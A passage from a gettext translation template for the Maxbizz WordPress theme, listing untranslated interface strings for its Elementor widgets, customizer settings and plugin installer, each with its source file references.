#: inc/backend/elementor/widgets/image-box.php:124
#: inc/backend/elementor/widgets/pricing-table.php:112
#: inc/backend/elementor/widgets/team-1.php:104
#: inc/backend/elementor/widgets/team-2.php:104
#: inc/backend/elementor/widgets/team-3.php:104
msgid "Link"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:158
#: inc/backend/elementor/widgets/team-2.php:158
#: inc/backend/elementor/widgets/team-3.php:158
msgid "Link To Details"
msgstr ""

#: inc/backend/elementor/widgets/tab-titles.php:52
msgid "Link to ID Content"
msgstr ""

#: inc/frontend/template-tags.php:330
msgid "LinkedIn"
msgstr ""

#: inc/backend/customizer/customizer.php:605
msgid "Linkedin"
msgstr ""

#. used between list items, there is a space after the comma
#: inc/frontend/template-tags.php:131
msgctxt "list item separator"
msgid " "
msgstr ""

#. used between list items, there is a space after the comma
#: inc/frontend/template-tags.php:108
msgctxt "list item separator"
msgid ", "
msgstr ""

#: archive-ot_portfolio.php:50
msgid "Load More"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:161
#: inc/backend/elementor/widgets/portfolio-filter.php:669
msgid "Load More Button"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:181
msgid "Load Number Projects"
msgstr ""

#: archive-ot_portfolio.php:50
msgid "Loading"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:170
msgid "Loading Text"
msgstr ""

#: inc/backend/elementor/widgets/header/logo.php:35
msgid "Logo"
msgstr ""

#: inc/frontend/preloader.php:69
msgid "Logo Height"
msgstr ""

#: inc/frontend/preloader.php:36
msgid "Logo Preload"
msgstr ""

#: inc/frontend/preloader.php:50
msgid "Logo Width"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:35
msgid "Logos"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:105
#: inc/backend/elementor/widgets/image-box-carousel.php:167
#: inc/backend/elementor/widgets/portfolio-carousel.php:96
#: inc/backend/elementor/widgets/post-carousel.php:104
#: inc/backend/elementor/widgets/team-carousel.php:212
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:134
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:144
msgid "Loop"
msgstr ""

#: inc/backend/plugin-requires.php:34
msgid "MailChimp for WordPress"
msgstr ""

#: inc/backend/elementor/widgets/button.php:44
msgid "Main Color"
msgstr ""

#: inc/backend/elementor/widgets/image-box.php:89
msgid "Marketing Research"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:47
msgid "Masonry"
msgstr ""

#. Name of the theme
#: inc/backend/elementor/elementor.php:17
msgid "Maxbizz"
msgstr ""

#. Description of the theme
msgid ""
"Maxbizz is the nice WordPress theme for Consulting and Finance Industry. "
"Financial Advisors, Insurance Brokers, Accountants, Lawyers, Consultants. "
"Maxbizz is easy to use, it provides everything you need to create great "
"looking website. With Maxbizz you can impress your customer by it’s "
"professional design and the interactivity. Maxbizz built with latest website "
"technology to ensure your website is looks nice on desktop and mobile. Get "
"Maxbizz now!"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:36
#: inc/backend/elementor/widgets/team-2.php:36
#: inc/backend/elementor/widgets/team-3.php:36
msgid "Member Team"
msgstr ""

#: inc/backend/elementor/widgets/header/menu-mobile.php:35
#: inc/backend/elementor/widgets/header/menu-mobile.php:109
#: inc/backend/elementor/widgets/header/menu.php:35
msgid "Menu"
msgstr ""

#: inc/backend/elementor/widgets/header/menu.php:208
msgid "Menu Items"
msgstr ""

#: inc/backend/elementor/widgets/header/menu.php:84
msgid "Menu Parents"
msgstr ""

#: inc/backend/elementor/widgets/message-box.php:35
msgid "Message Box"
msgstr ""

#: inc/backend/elementor/widgets/post-carousel.php:375
msgid "Meta"
msgstr ""

#: inc/backend/plugin-requires.php:14
msgid "Meta Box"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:48
msgid "Metro"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:382
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:203
msgid "Middle"
msgstr ""

#: inc/backend/elementor/column.php:40
msgid "Min Width (px)"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:110
#: inc/backend/elementor/widgets/countdown.php:112
msgid "Minute"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:151
#: inc/backend/elementor/widgets/countdown.php:153
msgid "Minutes"
msgstr ""

#: inc/backend/customizer/customizer.php:465
#: inc/backend/customizer/customizer.php:509
msgid "Mobile"
msgstr ""

#: inc/backend/elementor/widgets/switcher.php:68
msgid "Monthly"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:129
msgid "Multi"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:43
#: inc/backend/elementor/widgets/team-1.php:63
#: inc/backend/elementor/widgets/team-1.php:82
#: inc/backend/elementor/widgets/team-2.php:63
#: inc/backend/elementor/widgets/team-2.php:82
#: inc/backend/elementor/widgets/team-3.php:63
#: inc/backend/elementor/widgets/team-3.php:82
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:373
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:355
msgid "Name"
msgstr ""

#: comments.php:59
msgid "Name*"
msgstr ""

#: inc/frontend/widgets/author-widget.php:104
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:53
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:77
msgid "Name:"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:110
#: inc/backend/elementor/widgets/client-logos.php:122
#: inc/backend/elementor/widgets/client-logos.php:154
#: inc/backend/elementor/widgets/client-logos.php:166
#: inc/backend/elementor/widgets/image-box-carousel.php:172
#: inc/backend/elementor/widgets/image-box-carousel.php:184
#: inc/backend/elementor/widgets/image-box-carousel.php:216
#: inc/backend/elementor/widgets/image-box-carousel.php:228
#: inc/backend/elementor/widgets/portfolio-carousel.php:89
#: inc/backend/elementor/widgets/portfolio-carousel.php:101
#: inc/backend/elementor/widgets/portfolio-carousel.php:113
#: inc/backend/elementor/widgets/portfolio-carousel.php:145
#: inc/backend/elementor/widgets/portfolio-carousel.php:157
#: inc/backend/elementor/widgets/portfolio-carousel.php:243
#: inc/backend/elementor/widgets/portfolio-filter.php:209
#: inc/backend/elementor/widgets/portfolio-filter.php:446
#: inc/backend/elementor/widgets/post-carousel.php:109
#: inc/backend/elementor/widgets/post-carousel.php:121
#: inc/backend/elementor/widgets/post-carousel.php:153
#: inc/backend/elementor/widgets/post-carousel.php:165
#: inc/backend/elementor/widgets/pricing-table.php:46
#: inc/backend/elementor/widgets/pricing-table.php:433
#: inc/backend/elementor/widgets/team-carousel.php:217
#: inc/backend/elementor/widgets/team-carousel.php:229
#: inc/backend/elementor/widgets/team-carousel.php:261
#: inc/backend/elementor/widgets/team-carousel.php:273
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:139
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:151
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:183
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:195
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:149
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:161
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:193
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:221
#: inc/backend/elementor/widgets/video-button.php:89
msgid "No"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:279
msgid "No contect From 7 form found"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:296
msgid "No Pages Found!"
msgstr ""

#: inc/backend/elementor/widgets/button.php:163
#: inc/backend/elementor/widgets/client-logos.php:250
#: inc/backend/elementor/widgets/features-service.php:185
#: inc/backend/elementor/widgets/features-service.php:371
#: inc/backend/elementor/widgets/icon-box-1.php:191
#: inc/backend/elementor/widgets/icon-box-2.php:202
#: inc/backend/elementor/widgets/image-box-carousel.php:416
#: inc/backend/elementor/widgets/image-box.php:318
#: inc/backend/elementor/widgets/portfolio-filter.php:724
#: inc/backend/elementor/widgets/pricing-table.php:467
#: inc/backend/elementor/widgets/tab-titles.php:158
#: inc/backend/elementor/widgets/tabs.php:147
#: inc/backend/elementor/widgets/team-1.php:226
#: inc/backend/elementor/widgets/team-3.php:178
#: inc/backend/elementor/widgets/video-button.php:145
msgid "Normal"
msgstr ""

#: template-parts/content-none.php:14
msgid "Nothing Found"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:183
#: inc/backend/elementor/widgets/counter-icon.php:176
#: inc/backend/elementor/widgets/counter.php:153
#: inc/backend/elementor/widgets/features-service.php:192
#: inc/backend/elementor/widgets/features-service.php:233
#: inc/backend/elementor/widgets/features-service.php:292
#: inc/backend/elementor/widgets/flip-box.php:63
#: inc/backend/elementor/widgets/flip-box.php:199
msgid "Number"
msgstr ""

#: inc/frontend/widgets/recent-posts.php:141
msgid "Number of posts to show:"
msgstr ""

#: inc/backend/elementor/widgets/counter.php:41
msgid "Number Position"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:65
msgid "Number:"
msgstr ""

#. Author of the theme
msgid "OceanThemes"
msgstr ""

#: inc/backend/elementor/elementor.php:195
msgid "Offset"
msgstr ""

#: inc/backend/elementor/widgets/header/menu-mobile.php:60
msgid "On Left"
msgstr ""

#: inc/backend/elementor/widgets/header/menu-mobile.php:61
msgid "On Right"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:72
msgid "On Success Redirect To"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:88
msgid "One"
msgstr ""

#: inc/frontend/builder.php:94
msgid ""
"Oops! The page you are looking for does not exist. Please return to the "
"site’s homepage."
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:257
#: inc/backend/elementor/widgets/client-logos.php:291
msgid "Opacity"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:17
msgid "OT Accordions"
msgstr ""

#: inc/backend/elementor/widgets/button.php:17
msgid "OT Button"
msgstr ""

#: inc/backend/elementor/widgets/header/cart.php:17
msgid "OT Cart Header"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:17
msgid "OT Client Logos"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:17
msgid "OT CountDown"
msgstr ""

#: inc/backend/elementor/widgets/counter.php:17
msgid "OT Counter 1"
msgstr ""

#: inc/backend/elementor/widgets/counter-icon.php:17
msgid "OT Counter 2"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:17
msgid "OT Features Service"
msgstr ""

#: inc/backend/elementor/widgets/flip-box.php:17
msgid "OT Flip Box"
msgstr ""

#: inc/backend/elementor/elementor.php:25
msgid "OT Header"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:17
msgid "OT Heading"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:17
msgid "OT Icon Box 1"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-2.php:17
msgid "OT Icon Box 2"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:17
msgid "OT Icon Box Grid"
msgstr ""

#: inc/backend/elementor/widgets/image-box.php:17
msgid "OT Image Box"
msgstr ""

#: inc/backend/elementor/widgets/image-box-carousel.php:17
msgid "OT Image Box Carousel"
msgstr ""

#: inc/backend/elementor/widgets/header/logo.php:17
msgid "OT Logo"
msgstr ""

#: inc/backend/elementor/widgets/header/menu-mobile.php:17
msgid "OT Menu Mobile"
msgstr ""

#: inc/backend/elementor/widgets/message-box.php:17
msgid "OT Message Box"
msgstr ""

#: inc/backend/elementor/widgets/header/menu.php:17
msgid "OT Nav Menu"
msgstr ""

#: inc/backend/plugin-requires.php:51
msgid "OT One Click Demo Content"
msgstr ""

#: inc/backend/plugin-requires.php:39
msgid "OT Portfolio"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:17
msgid "OT Portfolio Carousel"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:17
msgid "OT Portfolio Filter"
msgstr ""

#: inc/backend/elementor/widgets/post-carousel.php:17
msgid "OT Post Carousel"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:17
msgid "OT Pricing Table"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:17
msgid "OT Progress Bars"
msgstr ""

#. Widget name will appear in UI
#: inc/frontend/widgets/recent-posts.php:12
#: inc/frontend/widgets/recent-posts.php:15
msgid "OT Recent Posts"
msgstr ""

#: inc/backend/elementor/widgets/header/search.php:17
msgid "OT Search Header"
msgstr ""

#: inc/backend/elementor/widgets/header/side-panel.php:17
msgid "OT Side Panel"
msgstr ""

#: inc/backend/elementor/widgets/switcher.php:17
msgid "OT Switcher(Pricing Table)"
msgstr ""

#: inc/backend/elementor/widgets/tab-titles.php:17
msgid "OT Tab Titles"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:17
msgid "OT Tabs"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:17
msgid "OT Team 1"
msgstr ""

#: inc/backend/elementor/widgets/team-2.php:17
msgid "OT Team 2"
msgstr ""

#: inc/backend/elementor/widgets/team-3.php:17
msgid "OT Team 3"
msgstr ""

#: inc/backend/elementor/widgets/team-carousel.php:17
msgid "OT Team Carousel"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:17
msgid "OT Testimonial Carousel 1"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-2.php:17
msgid "OT Testimonial Carousel 2"
msgstr ""

#: inc/backend/elementor/widgets/video-button.php:17
msgid "OT Video Button"
msgstr ""

#: inc/backend/elementor/widgets/flip-box.php:83
msgid ""
"Our firm has helped clients engaged in more than 100 different subsectors of "
"the aerospace, space markets."
msgstr ""

#: inc/backend/elementor/widgets/heading.php:56
msgid "our services"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:266
msgid "Overlay"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:160
#: inc/backend/elementor/widgets/accordions.php:210
#: inc/backend/elementor/widgets/tab-titles.php:125
#: inc/backend/elementor/widgets/tabs.php:263
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:270
msgid "Padding"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:166
#: inc/backend/elementor/widgets/flip-box.php:131
#: inc/backend/elementor/widgets/flip-box.php:237
#: inc/backend/elementor/widgets/icon-box-grid.php:218
#: inc/backend/elementor/widgets/image-box-carousel.php:280
#: inc/backend/elementor/widgets/image-box.php:179
#: inc/backend/elementor/widgets/message-box.php:112
#: inc/backend/elementor/widgets/pricing-table.php:134
#: inc/backend/elementor/widgets/team-1.php:202
#: inc/backend/elementor/widgets/team-2.php:239
#: inc/backend/elementor/widgets/team-3.php:185
#: inc/backend/elementor/widgets/team-carousel.php:366
msgid "Padding Box"
msgstr ""

#: inc/backend/customizer/customizer.php:219
msgid "Page Header"
msgstr ""

#: inc/backend/customizer/customizer.php:458
msgid "Page Header Height (Ex: 300px)"
msgstr ""

#: inc/backend/meta-boxes.php:118 inc/backend/meta-boxes.php:208
#: inc/backend/customizer/customizer.php:336
msgid "Page Header On/Off"
msgstr ""

#: inc/backend/meta-boxes.php:100 inc/backend/meta-boxes.php:201
msgid "Page Header Settings"
msgstr ""

#: inc/backend/meta-boxes.php:108
msgid "Page Layout"
msgstr ""

#: inc/backend/customizer/customizer.php:585
msgid "Page Title"
msgstr ""

#: inc/backend/customizer/customizer.php:502
msgid "Page Title Size (Ex: 30px)"
msgstr ""

#: template-parts/content-page.php:19 template-parts/content-single.php:138
msgid "Pages:"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:77
msgid "per m2"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:300
msgid "Percent"
msgstr ""

#: inc/frontend/preloader.php:116
msgid "Percent Preload Font"
msgstr ""

#: inc/frontend/preloader.php:88
msgid "Percent Text Color"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:65
#: inc/backend/elementor/widgets/team-2.php:65
#: inc/backend/elementor/widgets/team-3.php:65
msgid "Peter Perish"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:43
#: inc/backend/elementor/widgets/team-2.php:43
#: inc/backend/elementor/widgets/team-3.php:43
#: inc/backend/elementor/widgets/team-3.php:238
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:311
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:293
msgid "Photo"
msgstr ""

#: inc/frontend/template-tags.php:332 inc/backend/customizer/customizer.php:604
#: inc/backend/elementor/widgets/team-1.php:142
#: inc/backend/elementor/widgets/team-2.php:142
#: inc/backend/elementor/widgets/team-3.php:142
msgid "Pinterest"
msgstr ""

#: inc/backend/plugin-requires.php:81
msgid "Plugin activated successfully."
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:433
msgid "Plus Background"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:422
msgid "Plus Color"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:206
msgid "Popup Gallery"
msgstr ""

#: inc/backend/customizer/customizer.php:203
msgid "Portfolio"
msgstr ""

#: inc/backend/customizer/customizer.php:644
msgid "Portfolio Archive"
msgstr ""

#: inc/backend/customizer/customizer.php:671
msgid "Portfolio Columns"
msgstr ""

#: inc/backend/elementor/widgets/header/menu-mobile.php:56
msgid "Position"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:373
msgid "Position Info"
msgstr ""

#. %s: post author.
#: inc/frontend/template-tags.php:60 inc/frontend/template-tags.php:92
#, php-format
msgctxt "post author"
msgid "%s"
msgstr ""

#. %s: post author.
#: inc/frontend/template-tags.php:104
#, php-format
msgctxt "post comment"
msgid "%s"
msgstr ""

#. %s: post date.
#: inc/frontend/template-tags.php:27 inc/frontend/template-tags.php:86
#, php-format
msgctxt "post date"
msgid "%s"
msgstr ""

#: inc/backend/elementor/widgets/post-carousel.php:187
msgid "Post Items"
msgstr ""

#: inc/backend/customizer/customizer.php:629
msgid "Post Navigation"
msgstr ""

#: inc/backend/elementor/widgets/post-carousel.php:36
msgid "Posts"
msgstr ""

#: inc/backend/customizer/customizer.php:713
msgid "Posts per page"
msgstr ""

#: inc/frontend/preloader.php:18 inc/frontend/preloader.php:29
msgid "Preloader"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:65
#: inc/backend/elementor/widgets/pricing-table.php:249
msgid "Price"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:36
msgid "Pricing Table"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:43
msgid "Pricing Table Featured"
msgstr ""

#: functions.php:46
msgid "Primary"
msgstr ""

#: inc/backend/customizer/customizer.php:1030
msgid "Primary Color"
msgstr ""

#: functions.php:99
msgid "Primary Sidebar"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:115
msgid "Progress Bar"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:179
#: inc/backend/elementor/widgets/portfolio-filter.php:331
msgid "Project Items"
msgstr ""

#: inc/backend/meta-boxes.php:226
msgid "Project Settings"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:36
msgid "Projects"
msgstr ""

#: inc/backend/customizer/customizer.php:726
msgid "Projects Navigation On/Off"
msgstr ""

#: inc/backend/meta-boxes.php:83
msgid "Quote"
msgstr ""

#: inc/backend/meta-boxes.php:89
msgid "Quote Name"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:127
msgid "Read More"
msgstr ""

#. 1: link to WP admin new post page.
#: template-parts/content-none.php:23
#, php-format
msgid ""
"Ready to publish your first post? <a href=\"%1$s\">Get started here</a>."
msgstr ""

#: inc/backend/customizer/customizer.php:608
msgid "Reddit"
msgstr ""

#: inc/frontend/template-tags.php:428 inc/backend/customizer/customizer.php:636
msgid "Related Posts"
msgstr ""

#: inc/backend/customizer/customizer.php:742
msgid "Related Projects"
msgstr ""

#: inc/backend/customizer/customizer.php:740
msgid "Related Projects Heading"
msgstr ""

#: inc/backend/customizer/customizer.php:733
msgid "Related Projects On/Off"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:230
msgid "response CSS"
msgstr ""

#: inc/backend/plugin-requires.php:80
msgid "Return to Required Plugins Installer"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:213
msgid "Reverse content"
msgstr ""

#: inc/backend/plugin-requires.php:45
msgid "Revolution Slider"
msgstr ""

#: inc/backend/elementor/widgets/button.php:75
#: inc/backend/elementor/widgets/countdown.php:54
#: inc/backend/elementor/widgets/counter-icon.php:53
#: inc/backend/elementor/widgets/counter.php:54
#: inc/backend/elementor/widgets/counter.php:78
#: inc/backend/elementor/widgets/heading.php:109
#: inc/backend/elementor/widgets/icon-box-1.php:55
#: inc/backend/elementor/widgets/icon-box-2.php:64
#: inc/backend/elementor/widgets/icon-box-grid.php:55
#: inc/backend/elementor/widgets/image-box-carousel.php:54
#: inc/backend/elementor/widgets/image-box.php:54
#: inc/backend/elementor/widgets/portfolio-carousel.php:206
#: inc/backend/elementor/widgets/portfolio-filter.php:245
#: inc/backend/elementor/widgets/portfolio-filter.php:358
#: inc/backend/elementor/widgets/portfolio-filter.php:692
#: inc/backend/elementor/widgets/progress-bars.php:95
#: inc/backend/elementor/widgets/switcher.php:53
#: inc/backend/elementor/widgets/tab-titles.php:83
#: inc/backend/elementor/widgets/team-1.php:189
#: inc/backend/elementor/widgets/team-2.php:227
#: inc/backend/elementor/widgets/team-3.php:333
#: inc/backend/elementor/widgets/team-carousel.php:354
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:53
#: inc/backend/elementor/widgets/video-button.php:55
#: inc/backend/elementor/widgets/header/logo.php:54
#: inc/backend/elementor/widgets/header/menu.php:67
msgid "Right"
msgstr ""

#: inc/backend/customizer/customizer.php:836
msgid "Right (Ex: 20px)"
msgstr ""

#: inc/frontend/page-header/breadcrumbs.php:85
msgid "Search"
msgstr ""

#: woocommerce/product-searchform.php:24
msgid "Search products&hellip;"
msgstr ""

#: inc/frontend/page-header/page-header.php:29
msgid "Search Results for: "
msgstr ""

#: inc/frontend/template-tags.php:228
msgid "Search&hellip;"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:118
#: inc/backend/elementor/widgets/countdown.php:120
msgid "Second"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:159
#: inc/backend/elementor/widgets/countdown.php:161
msgid "Seconds"
msgstr ""

#: inc/backend/customizer/customizer.php:760
msgid "Select a footer"
msgstr ""

#: inc/backend/customizer/customizer.php:295
#: inc/backend/customizer/customizer.php:313
msgid "Select a header"
msgstr ""

#: inc/backend/customizer/customizer.php:1008
msgid "Select a page 404"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:73
msgid ""
"Select a page which you want users to redirect to when the contact fom is "
"submitted and is successful. Leave Blank to Disable"
msgstr ""

#: inc/backend/customizer/customizer.php:323
msgid "Select a panel"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:42
#: inc/backend/elementor/widgets/portfolio-filter.php:55
#: inc/backend/elementor/widgets/post-carousel.php:42
msgid "Select Categories"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:51
msgid "Select Contact Form"
msgstr ""

#: inc/backend/customizer/customizer.php:675
msgid "Select default column for the portfolio page."
msgstr ""

#: inc/backend/customizer/customizer.php:551
msgid "Select default sidebar for the blog page."
msgstr ""

#: inc/woocommerce/woocommerce.php:300
msgid "Select default sidebar for the shop page."
msgstr ""

#: inc/backend/customizer/customizer.php:695
msgid "Select default style for the portfolio page."
msgstr ""

#: inc/backend/customizer/customizer.php:755
msgid "Select Footer"
msgstr ""

#: inc/backend/customizer/customizer.php:290
msgid "Select Header Desktop"
msgstr ""

#: inc/backend/customizer/customizer.php:308
msgid "Select Header Mobile"
msgstr ""

#: inc/backend/elementor/widgets/header/menu-mobile.php:43
#: inc/backend/elementor/widgets/header/menu.php:43
msgid "Select Menu"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:172
msgid "Select Options Css"
msgstr ""

#: inc/backend/customizer/customizer.php:656
#: inc/backend/customizer/customizer.php:1006
msgid "Select Page"
msgstr ""

#: inc/backend/customizer/customizer.php:648
msgid "Select page default for the portfolio archive page."
msgstr ""

#: inc/backend/customizer/customizer.php:318
msgid "Select Side Panel"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:256
msgid "Seperator"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:76
#: inc/backend/elementor/widgets/features-service.php:77
msgid "Service Title"
msgstr ""

#: inc/woocommerce/woocommerce.php:296
msgid "Shop Layout"
msgstr ""

#: inc/woocommerce/woocommerce.php:259
msgid "Shop Sidebar"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:322
msgid "Short Text"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:318
#: inc/backend/elementor/widgets/portfolio-filter.php:69
#: inc/backend/elementor/widgets/portfolio-filter.php:92
#: inc/backend/elementor/widgets/portfolio-filter.php:106
#: inc/backend/elementor/widgets/portfolio-filter.php:485
#: inc/backend/elementor/widgets/portfolio-filter.php:612
#: inc/backend/elementor/widgets/post-carousel.php:326
msgid "Show"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:104
msgid "Show Arrow"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:483
msgid "Show Button"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:316
#: inc/backend/elementor/widgets/portfolio-filter.php:610
#: inc/backend/elementor/widgets/post-carousel.php:324
msgid "Show Category"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:90
msgid "Show Count"
msgstr ""

#: inc/frontend/widgets/recent-posts.php:150
msgid "Show date time"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:67
msgid "Show Filter"
msgstr ""

#: inc/backend/elementor/widgets/post-carousel.php:53
msgid "Show Number Posts"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:53
#: inc/backend/elementor/widgets/portfolio-filter.php:152
msgid "Show Number Projects"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:75
msgid "Show Percent Text"
msgstr ""

#: inc/backend/elementor/widgets/header/side-panel.php:73
msgid "Side Panel"
msgstr ""

#: inc/backend/customizer/customizer.php:328
msgid "Side Panel On Left"
msgstr ""

#: inc/backend/customizer/customizer.php:253
msgid "Single Page"
msgstr ""

#: inc/backend/customizer/customizer.php:233
msgid "Single Post"
msgstr ""

#: inc/woocommerce/woocommerce.php:284
msgid "Single Product"
msgstr ""

#: inc/woocommerce/woocommerce.php:311
msgid "Single Product Layout"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:404
#: inc/backend/elementor/widgets/icon-box-2.php:398
#: inc/backend/elementor/widgets/icon-box-grid.php:267
#: inc/backend/elementor/widgets/video-button.php:110
msgid "Size"
msgstr ""

#: inc/frontend/template-tags.php:327
msgid "Skype Username"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:61
#: inc/backend/elementor/widgets/post-carousel.php:81
msgid "Slider"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:93
#: inc/backend/elementor/widgets/image-box-carousel.php:155
#: inc/backend/elementor/widgets/team-carousel.php:201
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:123
msgid "Slides To Show"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:73
#: inc/backend/elementor/widgets/post-carousel.php:93
msgid "Slides to Show"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:84
#: inc/backend/elementor/widgets/team-2.php:84
#: inc/backend/elementor/widgets/team-3.php:84
msgid "Social"
msgstr ""

#: inc/backend/customizer/customizer.php:592
msgid "Social Share"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:119
#: inc/backend/elementor/widgets/team-1.php:414
#: inc/backend/elementor/widgets/team-1.php:445
#: inc/backend/elementor/widgets/team-2.php:119
#: inc/backend/elementor/widgets/team-2.php:378
#: inc/backend/elementor/widgets/team-3.php:119
#: inc/backend/elementor/widgets/team-3.php:455
#: inc/backend/elementor/widgets/team-carousel.php:505
msgid "Socials"
msgstr ""

#: inc/backend/plugin-requires.php:69
msgid "Something went wrong with the plugin API."
msgstr ""

#: inc/frontend/builder.php:92
msgid "Sorry! Page Not Found!"
msgstr ""

#: template-parts/content-none.php:36
msgid ""
"Sorry, but nothing matched your search terms. Please try again with some "
"different keywords."
msgstr ""

#: inc/backend/plugin-requires.php:75
#, php-format
msgid ""
"Sorry, but you do not have the correct permissions to activate the %s plugin."
" Contact the administrator of this site for help on getting the plugin "
"activated."
msgid_plural ""
"Sorry, but you do not have the correct permissions to activate the %s "
"plugins. Contact the administrator of this site for help on getting the "
"plugins activated."
msgstr[0] ""
msgstr[1] ""

#: inc/backend/plugin-requires.php:72
#, php-format
msgid ""
"Sorry, but you do not have the correct permissions to install the %s plugin. "
"Contact the administrator of this site for help on getting the plugin "
"installed."
msgid_plural ""
"Sorry, but you do not have the correct permissions to install the %s plugins."
" Contact the administrator of this site for help on getting the plugins "
"installed."
msgstr[0] ""
msgstr[1] ""

#: inc/backend/plugin-requires.php:77
#, php-format
msgid ""
"Sorry, but you do not have the correct permissions to update the %s plugin. "
"Contact the administrator of this site for help on getting the plugin "
"updated."
msgid_plural ""
"Sorry, but you do not have the correct permissions to update the %s plugins. "
"Contact the administrator of this site for help on getting the plugins "
"updated."
msgstr[0] ""
msgstr[1] ""

#: inc/backend/customizer/customizer.php:826
#: inc/backend/elementor/widgets/client-logos.php:231
#: inc/backend/elementor/widgets/client-logos.php:335
#: inc/backend/elementor/widgets/countdown.php:209
#: inc/backend/elementor/widgets/counter-icon.php:146
#: inc/backend/elementor/widgets/counter-icon.php:212
#: inc/backend/elementor/widgets/counter.php:189
#: inc/backend/elementor/widgets/features-service.php:300
